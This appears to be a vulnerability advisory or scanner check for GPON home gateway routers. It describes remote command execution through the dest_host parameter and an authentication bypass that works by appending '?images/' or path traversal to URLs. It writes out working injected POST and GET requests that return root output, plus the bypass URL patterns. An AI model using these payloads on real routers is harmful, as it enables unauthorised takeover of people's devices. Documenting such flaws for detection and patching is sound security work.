An issue was discovered in GPON ONT Home Gateway Router web administration interface. Remote Command Execution could be triggered by sending a HTTP POST request to 'GponForm/diag_Form' URI with malicious shell script added to dest_host parameter. Because the router saves ping and traceroute command execution results in /tmp and transmits them to the user when the user revisits /diag.html, it's possible to execute arbitrary commands and retrieve their output.This allows an attacker to fully control the target device.
Consult your vendor for a patch or a workaround.
https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/
POST: /GponForm/diag_Form?images/ BODY: XWebPageName=diag&diag_action=tracert&wan_conlist=0&dest_host=fYM7K2qD;`id`;id;fYM7K2qD
Result: ;uid=0(root) gid=0(root);id;
GET: /GponForm/diag_Form?images/&XWebPageName=diag&diag_action=tracert&wan_conlist=0&dest_host=fYM7K2qD;`id`;id;fYM7K2qD
Result: ;uid=0(root) gid=0(root);id;
An issue was discovered in GPON ONT Home Gateway Router web administration interface. It is possible to bypass authentication of web interface by using the following approach:
http(s)://<Router IP>/<some file>?images/-
http(s)://<Router IP>/<some file>?style/-
http(s)://<Router IP>/<some file>?script/-
http(s)://<Router IP>/images/../<some file>-
http(s)://<Router IP>/style/../<some file>-
http(s)://<Router IP>/script/../<some file>
For example, /menu.html?images/ or /GponForm/diag_FORM?images/ URI.This allows an attacker to fully control the target device.
Consult your vendor for a patch or a workaround.